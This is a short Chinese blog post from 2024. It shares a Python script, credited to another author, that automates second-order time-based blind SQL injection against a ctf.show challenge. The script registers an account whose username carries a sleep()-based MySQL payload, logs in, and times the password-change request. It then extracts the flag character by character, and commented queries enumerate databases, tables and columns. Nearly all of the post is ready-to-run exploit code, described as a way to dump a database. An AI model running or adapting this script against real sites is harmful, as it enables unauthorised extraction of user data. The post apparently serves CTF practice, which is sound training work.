mysql基于二次注入(基于时间)盲注,python脚本

根据mysql二次注入原理,存储型注入利用,先注册,再登陆、再调用修改密码,完成自动时间盲注类型判断,实现脱裤

借用:“孤桜懶契”大佬的脚本

# -- coding:UTF-8 --
# Author:孤桜懶契
# Date:2021/8/10
# blog: gylq.gitee.io

import requests
import time


flag = ""
#*************************************************************************************************************************************************************
#--------查库名
#sql="select group_concat(schema_name) from information_schema.schemata"
#--------查表
#sql= "select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'"
#--------查字段
#sql= "select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'"
#--------查flag
sql= "select flag4 from ctfshow.flag"
#*************************************************************************************************************************************************************
payload = "admin' and if(ascii(substr(({}),{},1))>'{}',sleep(0.4),0)#"
i = 0

session = requests.session()
for i in range(1,666):
    head = 32
    tail = 127

    while head < tail:
        mid = (head+tail) >> 1
        url_register = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login_create.php"
        data = {
            'username' : payload.format(sql,i,mid),
            'password' : '22',
            're_password' : '22',
            'submit' : 'Register'
        }
        res = session.post(url=url_register,data=data)


        url_login = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/login.php"
        data = {
            'login_user' : payload.format(sql,i,mid),
            'login_password' : '22',
            'mysubmit' : 'Login'
        }
        res = session.post(url=url_login, data=data)

        url_change = "http://08fa48c9-0e53-4eec-8fa2-01e851961687.challenge.ctf.show:8080/pass_change.php"
        data = {
            'current_password' : '22',
            'password' : '1',
            're_password' : '1',
            'submit' : 'Reset'
        }
        start = time.time()
        res = session.post(url=url_change, data=data)
        end = time.time()
        print(end - start)
        if end-start > 0.4 and end-start < 1:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        print('[*] 开始盲注第{}位'.format(i))
        flag += chr(tail)
        print(flag)
    else:
        print('[*] Complete! Result Is >>> {}'.format(flag))
        break

 

posted on 2024-04-03 14:49  叶子在行动  阅读(65)  评论(0)    收藏  举报

导航